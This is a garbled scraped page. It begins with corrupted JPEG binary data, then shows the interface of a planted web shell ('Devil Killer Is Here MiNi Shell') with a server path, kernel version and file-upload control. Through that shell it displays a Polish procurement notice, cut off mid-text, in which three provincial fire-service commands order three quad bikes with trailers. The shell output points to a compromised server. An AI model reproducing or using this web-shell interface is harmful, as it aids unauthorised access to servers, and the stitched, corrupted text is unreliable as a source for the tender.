JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210802/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210802/0013366102-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00133661 z dnia 2021-08-02</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa 3 szt. quadów z lawetą </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzą zamawiający działający wspólnie</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zachodniopomorski Komendant Wojewódzki Państwowej Straży Pożarnej</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000173628</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Firlika 9/14</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Szczecin</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">71-637</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL424 - Miasto Szczecin</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@szczecin.kwpsp.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.gov.pl/web/kwpsp-szczecin</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Ochrona przeciwpożarowa </p> <h3 class="mb-0">1.8.) Informacje o pozostałych zamawiających działających wspólnie</h3> <h3 class="p-2 mt-4 bg-light">Zamawiający <span class="normal">2</span></h3> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Pomorski Komendant Wojewódzki Państwowej Straży Pożarnej</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">Regon 000 173 568</span></h3> <h3 class="mb-0">1.5) Adres zamawiającego</h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Sosnowa 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Gdańsk</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">80-521</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL634 - Gdański</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@straz.gda.pl</span></h3> <h3 class="mb-0 ">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.gov.pl/web/kwpsp-gdansk</span></h3> <h3 class="p-2 mt-4 bg-light">Zamawiający <span class="normal">3</span></h3> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Warmińsko-Mazurski Komendant Wojewódzki Państwowej Straży Pożarnej</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">Regon 000173597</span></h3> <h3 class="mb-0">1.5) Adres zamawiającego</h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Niepodległości 16</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Olsztyn</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">10-045</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">warmińsko-mazurskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL622 - Olsztyński</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@kwpsp.olsztyn.pl</span></h3> <h3 class="mb-0 ">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.gov.pl/web/kwpsp-olsztyn</span></h3> <h3 class="mb-0">1.9.) Podział obowiązków – zamówienie wspólne</h3> <p class="mb-0">1. Zachodniopomorski Komendant Wojewódzki Państwowej Straży Pożarnej przygotowuje<br/>dokumenty postępowania, w tym wzór umowy oraz dokonuje wszelkich wymaganych przepisami<br/>prawa ogłoszeń, przeprowadza postępowanie, wykonuje wszelkie obowiązki i uprawnienia<br/>zamawiającego wynikające z przepisów prawa oraz przyjmuje wadium.<br/>2. Każdy z zamawiających samodzielnie dokonuje odbioru quada z przyczepą, dostarczonego<br/>przez wykonawcę na adres tego zamawiającego.<br/>3. Dla każdego zamawiającego wystawiona zostanie osobna faktura dokumentująca nabycie<br/>quada z przyczepą.<br/>4. Każdy z zamawiających samodzielnie odpowiada za zapłatę ceny na rzecz wykonawcy.</p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa 3 szt. quadów z lawetą </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-24826d0f-f351-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00133661</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">02</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-08-02</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00009648/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.3 Dostawa 3 quadów z lawetą</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Projekt nr POIS.02.01.00-00-0017/16 pn. Zwiększenie skuteczności prowadzenia długotrwałych akcji ratowniczych </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://www.gov.pl/web/kwpsp-szczecin <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. Dokumenty postępowania zamieszczane będą na str. https://www.gov.pl/web/kwpsp-szczecin w zakł. Zamówienia publiczne.<br/>2. Wykonawca składa ofertę za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub wniosku” dostępnego na ePUAP – https://epuap.gov.pl/wps/portal i udostępnionego również na<br/>miniPortalu - https://miniportal.uzp.gov.pl/ (strona postępowania na miniportalu<br/>https://miniportal.uzp.gov.pl/Postepowania/09917682-5ddf-44ed-98ec-2a07000266f8<br/>3. Komunikacja pomiędzy Zamawiającym a Wykonawcami w szczególności składanie oświadczeń, wniosków, zawiadomień oraz przekazywanie informacji odbywa się elektronicznie za pośrednictwem na ePUAP lub przez miniPortal lub za pomocą poczty elektron. We wszelkiej korespondencji Zamawiający i Wykonawcy posługują się numerem ogł. (BZP lub nr postępowania – WT 2370.22.2021).<br/>4. Zamawiający dopuszcza również możliwość składania dokumentów elektronicznych, za pomocą poczty elektronicznej, na adres email: przetargi@szczecin.kwpsp.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja pomiędzy Zamawiającym a Wykonawcami w szczególności składanie oświadczeń,<br/>wniosków, zawiadomień oraz przekazywanie informacji odbywa się elektronicznie za pośrednictwem<br/>na ePUAP lub przez miniPortal lub za pomocą poczty elektronicznej.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/> administratorem Pani/Pana danych osobowych jest: Zachodniopomorski Komendant Wojewódzki<br/>Państwowej Straży Pożarnej z siedzibą władz w Komendzie Wojewódzkiej Państwowej Straży<br/>Pożarnej, ul. Firlika 9/14, 71-637 Szczecin;<br/> Administrator wyznaczył Inspektora Ochrony Danych, z którym może się Pani/Pan skontaktować w<br/>sprawach związanych z ochroną danych osobowych w następujący sposób:<br/>• pod adresem poczty elektronicznej: kancelaria@szczecin.kwpsp.gov.pl;<br/>• pisemnie na adres siedziby Administratora;<br/> Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym<br/>z postępowaniem o udzielenie zamówienia publicznego: „Dostawa 3 szt. quadów z lawetą”.<br/>Oznaczenie postępowania: WT.2370.22.2021, prowadzonym w trybie podstawowym;<br/> odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. 1 ustawy z dnia 11 września 2019 r. –<br/>Prawo zamówień publicznych (t.j. Dz. U. z 2021 r. poz. 1129), dalej „ustawa Pzp”;<br/> Pani/Pana dane osobowe będą przechowywane przez okres, który wyznaczony zostanie przede<br/>wszystkim na podstawie rozporządzenia Prezesa Rady Ministrów w sprawie instrukcji kancelaryjnej,<br/>jednolitych rzeczowych wykazów akt oraz instrukcji w sprawie działania archiwów zakładowych, chyba<br/>że przepisy szczególne stanowią inaczej;<br/> obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu<br/>o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z<br/>ustawy Pzp;<br/> w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosowanie do art. 22 RODO;<br/> posiada Pani/Pan:<br/>• na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>• na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych(1);<br/>• na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO(2);<br/>• prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że<br/>przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/> nie przysługuje Pani/Panu:<br/>• w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>• prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>• na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">WT 2370.22.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 34277,62 EUR </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dostawa 3 szt. quadów z lawetą oznakowanych jako pojazd<br/>Państwowej Straży Pożarnej, wyposażonych w sygnalizację świetlno-dźwiękową . Szczegółowy<br/>opis techniczny zawarto w załączniku nr 1 do swz. Warunki zamówienia opisano we wzorze umowy w załączniku nr 2 do swz. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">34113300-5 - Pojazdy terenowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">3 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za najkorzystniejszą zostanie uznana oferta, która uzyska najwyższą<br/>liczbę punktów obliczoną na podstawie zsumowania liczby punktów w poszczególnych kryteriach oceny ofert</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:<br/>1.1 nie podlegają wykluczeniu;<br/>1.2 spełniają warunki udziału w postępowaniu dotyczące:<br/>1.2.1. zdolności technicznej lub zawodowej:<br/>Minimalny poziom zdolności:<br/>Zamawiający uzna, że wykonawca posiada wymagane zdolności techniczne i/lub zawodowe<br/>zapewniające należyte wykonanie zamówienia, jeżeli wykonawca wykaże, że:<br/>w okresie trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia<br/>działalności jest krótszy – w tym okresie, wykonał należycie minimum dwie dostawy quada lub<br/>quadów o wartości min. 60 000 zł.<br/>W przypadku składania oferty wspólnej ww. warunek musi spełniać co najmniej jeden z<br/>wykonawców w całości.<br/>2. Z postępowania o udzielenie zamówienia wyklucza się wykonawcę w oparciu o art. 108 ust.1<br/>ustawy Pzp, tj. wykonawcę:<br/>2.1. będącego osobą fizyczną, którego prawomocnie skazano za przestępstwo:<br/>a) udziału w zorganizowanej grupie przestępczej albo związku mającym na celu popełnienie<br/>przestępstwa lub przestępstwa skarbowego, o którym mowa w art. 258 Kodeksu karnego,<br/>b) handlu ludźmi, o którym mowa w art. 189a Kodeksu karnego,<br/>c) o którym mowa w art. 228-230a, art. 250a Kodeksu karnego lub w art. 46 lub art. 48 ustawy z<br/>dnia 25 czerwca 2010 r. o sporcie,<br/>d) finansowania przestępstwa o charakterze terrorystycznym, o którym mowa w art. 165a<br/>Kodeksu karnego, lub przestępstwo udaremniania lub utrudniania stwierdzenia przestępnego<br/>pochodzenia pieniędzy lub ukrywania ich pochodzenia, o którym mowa w art. 299 Kodeksu<br/>karnego,<br/>e) o charakterze terrorystycznym, o którym mowa w art. 115 § 20 Kodeksu karnego, lub mające<br/>na celu popełnienie tego przestępstwa,<br/>f) powierzenia wykonywania pracy małoletniemu cudzoziemcowi, o którym mowa w art. 9 ust. 2<br/>ustawy z dnia 15 czerwca 2012 r. o skutkach powierzania wykonywania pracy cudzoziemcom<br/>przebywającym wbrew przepisom na terytorium Rzeczypospolitej Polskiej (Dz. U. poz. 769),<br/>g) przeciwko obrotowi gospodarczemu, o których mowa w art. 296-307 Kodeksu karnego,<br/>przestępstwo oszustwa, o którym mowa w art. 286 Kodeksu karnego, przestępstwo przeciwko<br/>wiarygodności dokumentów, o których mowa w art. 270-277d Kodeksu karnego, lub<br/>przestępstwo skarbowe,<br/>h) o którym mowa w art. 9 ust. 1 i 3 lub art. 10 ustawy z dnia 15 czerwca 2012 r. o skutkach<br/>powierzania wykonywania pracy cudzoziemcom przebywającym wbrew przepisom na terytorium<br/>Rzeczypospolitej Polskiej<br/>- lub za odpowiedni czyn zabroniony określony w przepisach prawa obcego;<br/>2.2. jeżeli urzędującego członka jego organu zarządzającego lub nadzorczego, wspólnika spółki<br/>w spółce jawnej lub partnerskiej albo komplementariusza w spółce komandytowej lub<br/>komandytowo-akcyjnej lub prokurenta prawomocnie skazano za przestępstwo, o którym mowa<br/>w pkt 1.1.;<br/>2.3. wobec którego wydano prawomocny wyrok sądu lub ostateczną decyzję administracyjną o<br/>zaleganiu z uiszczeniem podatków, opłat lub składek na ubezpieczenie społeczne lub<br/>zdrowotne, chyba że wykonawca odpowiednio przed upływem terminu do składania wniosków o<br/>dopuszczenie do udziału w postępowaniu albo przed upływem terminu składania ofert dokonał<br/>płatności należnych podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne<br/>wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłaty tych należności;<br/>2.4. wobec którego prawomocnie orzeczono zakaz ubiegania się o zamówienia publiczne;<br/>2.5. jeżeli zamawiający może stwierdzić, na podstawie wiarygodnych przesłanek, że wykonawca<br/>zawarł z innymi wykonawcami porozumienie mające na celu zakłócenie konkurencji, w<br/>szczególności jeżeli należąc do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16<br/>lutego 2007 r. o ochronie konkurencji i konsumentów, złożyli odrębne oferty, oferty częściowe<br/>lub wnioski o dopuszczenie do udziału w postępowaniu, chyba że wykażą, że przygotowali te<br/>oferty lub wnioski niezależnie od siebie;<br/>2.6. jeżeli, w przypadkach, o których mowa w art. 85 ust. 1 ustawy Pzp, doszło do zakłócenia<br/>konkurencji wynikającego z wcześniejszego zaangażowania tego wykonawcy lub podmiotu,<br/>który należy z wykonawcą do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego<br/>2007 r. o ochronie konkurencji i konsumentów, chyba że spowodowane tym zakłócenie<br/>konkurencji może być wyeliminowane w inny sposób niż przez wykluczenie wykonawcy z<br/>udziału w postępowaniu o udzielenie zamówienia.<br/>3. Dodatkowo Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 109 ust. 1 pkt<br/>4 ustawy Pzp, tj.:<br/>3.1. wykonawcę, w stosunku do którego otwarto likwidację, ogłoszono upadłość, którego<br/>aktywami zarządza likwidator lub sąd, zawarł układ z wierzycielami, którego działalność<br/>gospodarcza jest zawieszona albo znajduje się on w innej tego rodzaju sytuacji wynikającej z<br/>podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury.<br/>4. Wykonawca nie podlega wykluczeniu w okolicznościach określonych w art. 108 ust. 1 pkt 1, 2<br/>i 5 lub art. 109 ust. 1 pkt 4 ustawy Pzp, jeżeli udowodni Zamawiającemu, że spełnił łącznie<br/>następujące przesłanki:<br/>4.1. naprawił lub zobowiązał się do naprawienia szkody wyrządzonej przestępstwem,<br/>wykroczeniem lub swoim nieprawidłowym postępowaniem, w tym poprzez zadośćuczynienie<br/>pieniężne;<br/>4.2. wyczerpująco wyjaśnił fakty i okoliczności związane z przestępstwem, wykroczeniem lub<br/>swoim nieprawidłowym postępowaniem oraz spowodowanymi przez nie szkodami, aktywnie<br/>współpracując odpowiednio z właściwymi organami, w tym organami ścigania, lub<br/>zamawiającym;<br/>4.3. podjął konkretne środki techniczne, organizacyjne i kadrowe, odpowiednie dla zapobiegania<br/>dalszym przestępstwom, wykroczeniom lub nieprawidłowemu postępowaniu, w szczególności:<br/>a) zerwał wszelkie powiązania z osobami lub podmiotami odpowiedzialnymi za nieprawidłowe<br/>postępowanie wykonawcy,<br/>b) zreorganizował personel,<br/>c) wdrożył system sprawozdawczości i kontroli,<br/>d) utworzył struktury audytu wewnętrznego do monitorowania przestrzegania przepisów,<br/>wewnętrznych regulacji lub standardów,<br/>e) wprowadził wewnętrzne regulacje dotyczące odpowiedzialności i odszkodowań za<br/>nieprzestrzeganie przepisów, wewnętrznych regulacji lub standardów.<br/>5. Wykluczenie wykonawcy następuje:<br/>5.1. w przypadkach, o których mowa w art. 108 ust. 1 pkt 1 lit. a-g i pkt 2 ustawy Pzp, na okres 5<br/>lat od dnia uprawomocnienia się wyroku 